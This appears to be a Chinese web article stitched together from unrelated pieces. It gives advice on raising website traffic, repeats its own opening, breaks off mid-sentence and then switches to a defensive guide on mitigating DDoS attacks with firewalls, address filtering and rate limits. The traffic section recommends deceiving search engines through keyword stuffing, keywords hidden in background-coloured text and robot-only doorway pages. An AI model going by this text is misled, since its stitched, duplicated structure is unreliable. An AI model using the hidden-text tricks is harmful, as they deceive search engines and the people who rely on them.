这是每个网站都关心的焦点,同时也是最难解决的问题。要解决这个问题需要经验,更需要尝试!全球有无数个网站经营者都在为之努力地去作尝试,但是失败的个案却占了绝大部分!因为总有人走在我们的前面,他们的成功可能是偶然的,但更多是他们不停的实践任何的想法。即使失败,一些经验就会被积累。而成功有时来自那些经验,所以,我们不妨试试去作些探讨。
(一)改进现在网站
主页设计需要一些技术,而更多的是对整个Internet的了解,即使我们投入了非常大的精力,那也不一定就可以有相等程度的回报。所以我们要努力改造现有网站,使得它产生更多吸引力——或称之“粘贴力”,这是提高访问量的关键,不好的站点,没有人会喜欢。所以当我们决定要使自己的网站更具粘贴性的时候,也就是我们要精心地、持续地改造网站。注意:这是一个持续,不可松懈的长期性工作。
要令到自己的网站成为一个品牌之前,如下的6个问题是一定不可以含糊的,请仔细考虑:
+ 您的网站的定位是什么?
+ 哪些人(企业)应该是您的网站的访客?
+ 访客会留什么东西在您的网站上?
+ 您的网站想让访客得到什么?
+ 您的网站有什么东西会使得访客再次来?
+ 您的网站上有什么会使得访客逗留?
您的网站的定位是什么?
品牌策略:这个问题只有您才能回答,如果您没想过品牌策略这方面的问题,那么您的网站的前景真是难以乐观。
商务定位:www.vjob.com.cn从事的在Internet上的人才交流活动。但是需要强调的是:www.vjob.com.cn要做基于珠海的最大的网上人才交流市场 ,您的网站也须像www.vjob.com.cn这样的准确的,毫不含糊的定位。
目标客户:一个成功的商业网站,它一定会重视其本身的商业获利点:靠什么来获取利润?——说白一点,就是谁能够给您的网站提供收入?这是一个核心的问题。目前投资者之所以看重一个网站的无非就是两点:一是要么你现在就能赚钱;二是要么你将来能够赚钱!这两个要点所体现的就是我们所谈论的“网站经营的商业模式”。
基于这种认识,我们思考一下目前电子商务流行的两种形式:B2C 和 B2B。您可以根据实际情况加以选择。
有一点需要解释:当您的这个网站有大批量的注册用户时,将会有非常多的商家进帐机会——商业机会!注册用户将会成为您与商业伙伴洽商的筹码!投资者之所以关心注册用户也必然是基于这样的一个原因。
网站如何提高访问量
这是个吸引人的话题,同时也是最难解决的问题。有些人曾经无数次尝试着改变,却发现计数器比蜗牛还慢。要突破,需要某种指导。因为总有人走在你前面,他们的成功可能是偶然的,但更多是他们不停实践的想法。即使失败,经验会被积累。而成功有时来自那些经验。
一.改造你的站点
主页的设计需要一些技术,而更多的是对整个网络的了解,即使投入了非常大的精力,但只是遭遇着失败,这就是现在许多非常优秀的个人主页还默默无闻的道理。所以我们要努力改造自己的站点,使得它产生更多的吸引力,这是提高访问量的关键,不好的站点,没有人会喜欢。当尝试改造自己站点时,请仔细考虑以下问题:
1.你的站点的“定位”是什么?
2.那些人应该是你的访客?
3.你想让别人得到什么?(先别想你会得到什么!)
4.什么会使得访客再次光顾?
5.站点上有那些东西会使得访客逗留?
不管出于什么目的,你都会把站点规划成某种类型,比如新闻或者文学,而选择好的类型是站点成功的第一步。有两种类型:第一种,为别人,即提供大多数人喜欢的内容(投其所好);第二,为自己,即把自己喜欢的内容提供给别人(孤芳自赏)。而这两种类型中,第一种更容易获得大家的青睐。
定位好自己的站点类型后,就要考虑哪些人该是访客。其实这个问题在定位网站类型时,已经作了回答,如果选择文学类型,那么爱好文学的就会是访客,确定了访客,才有信心去提供适宜的内容。
有人说过,要让一万个人访问你的站点,是很容易的,但想让这一万个人再次访问你的站点,就非常的难。所以,要思考是什么因素会使得访客再次光临。每天更新?还是内容独特?下面是一些经验:
要让人访问您的网站,并不太难,让这些人再访问您的网站,就绝非易事了。我们要思考的是:网站上有些什么会使得访客再来。每分钟的更新?还是内容独特?还是个性化策略?还是安营扎寨的落“户”策略?或者更多我们连想都不敢想象的东西?下面是值得借鉴的经验:
1、漂亮悦目的界面
也许有人要说内容最重要,漂亮与否在其次。听起来不错,其实是大错特错!!如果您的网站是搜索引擎,或是门户网站,或是新闻网站,也许界面不需要漂亮,例如去YAHOO的人的是为了通过这个“门”快速去另外的一个地方,他们并不会留在YAHOO中;但其它类型的网站,它营造的是一个虚拟社会,我们希望来的人都留下来,都来“落户”。所以厅堂一定要漂亮悦目——搞清“门”“户”的观念十分重要!
尽量使用最新的WEB技术来设计页面。尽管内容是站点的关键,但没有悦目的视觉效果和享受,会使访客有枯燥无味的感觉。但在使用新技术时,不要凌驾于访客之上,尽量与每一个人的系统相兼容。
2、随时更新,方便查找
网站能每天准备100条或是1000条信息吗?您能做到在8小时的上网高峰时间段内,平均每分钟1条消息吗?如果您能,恭喜您,您的访问量想不高都不行。但还有很大的潜力可以挖掘。不要满足于已取得的成绩,一个长时间不“更新”内容的站点,没有人会喜欢。所以,要随时更换站点上的内容,哪怕只是变化一个图片,否则您会随时被竞争对手甩在后面,我们要时刻保持更好的状态。
方便查找——提供“全文搜索”!当我们的内容多到不得了的时候,我们就要考虑另一个问题:那就是要查找方便!如果您还没做信息查找功能,请立即做,如果您已经做了,请检讨一下,看看是否可以改进。
3、个性化信息,有价值的内容
对于网站的内容,不同的访问者都会有不同的敏感度,而最有价值的一定是能满足访问者需求的信息——这就是个性化信息是最有价值的内容含义。
目前网络个性化的信息就是因为计算机的强大筛选过滤功能而得以实现。网络上获取信息变得十分容易,所以如果您的网站能经常提供有价值的信息,将更能吸引访客。如果只是拷贝别人的信息,时间长了,就会令访客感到厌倦。
4、网站速度快
如果您的网站要成为No.1,则速度将会是最终归要面对的一个问题。作为个人站点,在选择免费空间服务器时,要选择速度快的,而不是连接半天了,还没有见到半点动静的服务器。
5、交互的内容
越来越多的访客希望有互动的内容,他们不想只是看,还想动动手,在您的网站上加点什么。所以,增加一个BBS或者聊天室,这些都会提高站点的流量。
小结:改造站点是提高站点访问量最关键的一步,没有良好的交互效果给访问者,再做什么也是枉然。
二.访客来自哪里
一个站点的流量由两部分组成,一部分为固定的访客,另一部分是新的随机访客。固定的访客是站点流量“固定增加”的保证,而新的访客是站点流量“随时增加”的保证。一般来说,固定访客的来源是收藏夹书签,也就是访客把你的站点作上了“标记”,以便下次的访问。而新的访客就会来自网络的四面八方了,可能是其它站点的链接或者在搜索引擎搜索到的,总之,考虑访客来自那里,可以确定自己的宣传策略是否成功。
过去,想知道自己站点客源的分布是件不可能的事情,而随着相关免费服务的推出,使得我们可以随时了解站点的访问情况。目前国内两大“流量分析”站点网易和热讯都能提供相关的服务,但因为设置的不同,使得两个站点在分析同一个站点时,其结果却相差很远。所以,当我们在选择国内此类服务时,最好再申请一个国外同样的服务,这样,结果相对来说准确些。流量分析服务能让我们确定访客是如何找到站点的,而另外的访客为什么没有找到你的站点。比如,当你把站点“登录”到搜索引擎后,通过“分析”没有发现访客来自那里,那么你要确定自己的站点是否成功的列在搜索引擎目录里,如果发现没有自己的站点,那么,你就应该重新进行登记。
三.注册到搜索引擎
把站点注册到搜索引擎是每一个人都会做的,但却没有人真正了解这样做是否真有效。以我的经验,即使我们把站点注册到搜索引擎里,也并不能明显地提高站点的流量,可能的机会是:当有一万次搜索时,搜索到你网站点并进入的机会只可能会是1次,更有可能一次机会都没有,我并没有夸张。我们要了解一下注册的技巧,而不是简单的告诉搜索引擎我在那。
搜索引擎分为两种,一种为人工登记,比如yahoo,另一种为自动登记的,这是目前最多的类型。人工登记,就是靠人把站点的资料输入数据库,它的好处是目录会清晰明了。相对来说内容较少,但被搜索到的机会就会增加。而自动登记的站点,内容十分丰富,但这样一来,搜索时会把不相关的站点也搜索出来。这两种站点,对于我们来说,都可以利用,但要知道一些技巧。
在这里,我要提议的是,如果您的网站是中文的,最好登记到中文的搜索引擎里去(如:搜狐www.sohu.com 、中文Excite、网易www.netease.com 、新浪www.sina.com)。因为这样被找到的机会就能增加不少,而中文搜索引擎站点。首推cn.yahoo.com,可能有些人觉得yahoo中文有点不尽人意,但因为它的品牌深入人心,所以访问者非常多。而且它目前所含的内容不丰富,这样,站点成功登记到YAHOO后,被发现的机会要比其它站点多。但有一点我们要注意,在登记站点时,我们一定要注意关键字Keyword的筛选并推敲,对此要有足够的重视。
一个搜索站点可能会包含十分多的内容。这样,当搜索某一个站点时,会搜索出成千上万个,更多的站点已经埋没在了后面。这里值得一提:只有在排在前10名的搜索结果时,被点击到的可能性才会高。因而怎样提高自己站点的排位变成了是否成功登记的关键,因为即使登记到一个搜索站点上面,如果被排在后面,效果就差得太远了。这种情况在自动登记的站点出现得多些。提高站点排位是值得研究的问题,网络上也出现了为站点提升排位的服务(当然是有代价的),记住第一位只能有一个。
四.“META”标签的利用
META标签的作用是提供有关HTML文档的信息,而它所包含的内容并不出现在网页上。网页制作者很少会注意到这个“标签”,因为即使把它删除不用,也不会影响网页的外观,。“META”最大的作用就是向搜索引擎提供关于本站的描述的“关键字”,简单地说,当搜索引擎的机器人搜索到你的网站时,会首先检查META中所描述的关键字,然后把这些关键字加入到数据库中。所以,利用好META标签会让你的站点在搜索引擎中被搜索到的机会增加。META标签的用法是这样的:metaname="Keywords"CONTENT="关键字,关键字,关键字"
在“CONTENT”处,你尽可能把热门的关键字列出在这里,即使你网页上并不包含这些内容。虽然,这种做法感觉上有点“欺骗”,但值得放心的是,我们只是"欺骗"机器人而已,所以,放心加入最热的关键字,比如Clinton(克林顿),这里还有个技巧,你可以重复某一个关键字,这样可以提高自己网站的排行位置,如:metaname="Keywords"CONTENT="china,china,china,china
不过,我还得提醒你,现在"新式"的搜索引擎不在关注META标签了,可能它们发现了那种“欺骗”,所以,机器人避开了,只是来扫描你的网页,并把出现最多的词作为关键字,或者把网页顶部的词作为关键字。这样META就失去了作用,怎么办?其实这没什么,我们还有更多的方法“欺骗”机器人。因为目前的搜索引擎多数会扫描你的整个网页,这样你可以把热门的关键字放到网页上,这样,每个人就都能看到关键字了,当然包括机器人。我们要设法把关键字“隐藏”到网页里面,怎样做?很简单,把关键字与背景颜色弄成一致即可。还有一个更好的方法,制作一个网页,把你知道的关键字全部放到这个网页上,想怎么放就怎么放,因为这一页只是给机器人看的。
你可以利用以上两种方法设置关键字。要记住,你要做一个链接,连接到你的网站,这样做是最好的方法,因为你可以尽可能提供机器人最全,最好,最热的关键字,而这一页并没有人看到。
五.广告的交换
1、广告交换。被许多网站利用,但即使利用了广告,也没有带来更多访客,原因在那呢。首先,我们来看第一种广告交换,即个人站点间互相交换LOGO,这是目前最多的广告交换。许多个人站点,很容易就建立了一个链接。但可惜,有些连接没有起到作用,所以,很多个人站点就提出了几个条件,第一,双方的访问量相当;第二,首页交换。显而易见,这种做法是有道理的的。以笔者的经验,当与一个个人站点交换链接时,对方把我的LOGO放到了友情链接页,而不是首页,友情链接那一页包含了许多其它交换的LOGO,与我意料中一样,没有一位访客来自那里。所以,过了几天,我提出了上面两个条件,效果的确好。
2、商业广告交换。提供这种服务的地方有很多,国内的,国外的,交换的规则很简单,表面上是很公平的,我没有更多的技巧给你,只是提醒你,选择一个最热的广告交换商,这是个很简单的技巧,但并没有人注意。
六.获得一个奖励
有些组织提供给我们一些机会,让我们获得某种奖励,第一名,第二名。而参加者都想排在第一位,这样就能增加曝光度。参加这种活动,会有利于个人站点的宣传。对于
怎么要预防黑客网络流量限制和查看谁攻击你
(1)定期扫描 要定期扫描现有的网络主节点,清查可能存在的安全漏洞,对新出现的漏洞及时进行清理。骨干节点的计算机因为具有较高的带宽,是黑客利用的最佳位置,因此对这些主机本身加强主机安全是非常重要的。而且连接到网络主节点的都是服务器级别的计算机,所以定期扫描漏洞就变得更加重要了。 (2)在骨干节点配置防火墙 防火墙本身能抵御DdoS攻击和其他一些攻击。在发现受到攻击的时候,可以将攻击导向一些牺牲主机,这样可以保护真正的主机不被攻击。当然导向的这些牺牲主机可以选择不重要的,或者是linux以及unix等漏洞少和天生防范攻击优秀的系统。 (3)用足够的机器承受黑客攻击 这是一种较为理想的应对策略。如果用户拥有足够的容量和足够的资源给黑客攻击,在它不断访问用户、夺取用户资源之时,自己的能量也在逐渐耗失,或许未等用户被攻死,黑客已无力支招儿了。不过此方法需要投入的资金比较多,平时大多数设备处于空闲状态,和目前中小企业网络实际运行情况不相符。 (4)充分利用网络设备保护网络资源 所谓网络设备是指路由器、防火墙等负载均衡设备,它们可将网络有效地保护起来。当网络被攻击时最先死掉的是路由器,但其他机器没有死。死掉的路由器经重启后会恢复正常,而且启动起来还很快,没有什么损失。若其他服务器死掉,其中的数据会丢失,而且重启服务器又是一个漫长的过程。特别是一个公司使用了负载均衡设备,这样当一台路由器被攻击死机时,另一台将马上工作。从而最大程度的削减了DdoS的攻击。 (5)过滤不必要的服务和端口 过滤不必要的服务和端口,即在路由器上过滤假IP……只开放服务端口成为目前很多服务器的流行做法,例如WWW服务器那么只开放80而将其他所有端口关闭或在防火墙上做阻止策略。 (6)检查访问者的来源 使用Unicast Reverse Path Forwarding等通过反向路由器查询的方法检查访问者的IP地址是否是真,如果是假的,它将予以屏蔽。许多黑客攻击常采用假IP地址方式迷惑用户,很难查出它来自何处。因此,利用Unicast Reverse Path Forwarding可减少假IP地址的出现,有助于提高网络安全性。 (7)过滤所有RFC1918 IP地址 RFC1918 IP地址是内部网的IP地址,像10.0.0.0、192.168.0.0 和172.16.0.0,它们不是某个网段的固定的IP地址,而是Internet内部保留的区域性IP地址,应该把它们过滤掉。此方法并不是过滤内部员工的访问,而是将攻击时伪造的大量虚假内部IP过滤,这样也可以减轻DdoS的攻击。 (8)限制SYN/ICMP流量 用户应在路由器上配置SYN/ICMP的最大流量来限制SYN/ICMP封包所能占有的最高频宽,这样,当出现大量的超过所限定的SYN/ICMP流量时,说明不是正常的网络访问,而是有黑客入侵。早期通过限制SYN/ICMP流量是最好的防范DOS的方法,虽然目前该方法对于DdoS效果不太明显了,不过仍然能够起到一定的作用。
寻找机会应对攻击
如果用户正在遭受攻击,他所能做的抵御工作将是非常有限的。因为在原本没有准备好的情况下有大流量的灾难性攻击冲向用户,很可能在用户还没回过神之际,网络已经瘫痪。但是,用户还是可以抓住机会寻求一线希望的。 (1)检查攻击来源,通常黑客会通过很多假IP地址发起攻击,此时,用户若能够分辨出哪些是真IP哪些是假IP地址,然后了解这些IP来自哪些网段,再找网网管理员将这些机器关闭,从而在第一时间消除攻击。如果发现这些IP地址是来自外面的而不是公司内部的IP的话,可以采取临时过滤的方法,将这些IP地址在服务器或路由器上过滤掉。 (2)找出攻击者所经过的路由,把攻击屏蔽掉。若黑客从某些端口发动攻击,用户可把这些端口屏蔽掉,以阻止入侵。不过此方法对于公司网络出口只有一个,而又遭受到来自外部的DdoS攻击时不太奏效,毕竟将出口端口封闭后所有计算机都无法访问internet了。 (3)最后还有一种比较折中的方法是在路由器上滤掉ICMP。虽然在攻击时他无法完全消除入侵,但是过滤掉ICMP后可以有效的防止攻击规模的升级,也可以在一定程度上降低攻击的级别。[1][2][3] 不知道身为网络管理员的你是否遇到过服务器因为拒绝服务攻击(DDOS攻击)都瘫痪的情况呢?就网络安全而言目前最让人担心和害怕的入侵攻击就要算是DDOS攻击了。他和传统的攻击不同,采取的是仿真多个客户端来连接服务器,造成服务器无法完成如此多的客户端连接,从而无法提供服务。
总结
目前网络安全界对于DdoS的防范还是没有什么好办法的,主要靠平时维护和扫描来对抗。简单的通过软件防范的效果非常不明显,即便是使用了硬件安防设施也仅仅能起到降低攻击级别的效果,Ddos攻击只能被减弱,无法被彻底消除。不过如果我们按照本文的方法和思路去防范DdoS的话,收到的效果还是非常显著的,可以将攻击带来的损失降低到最小。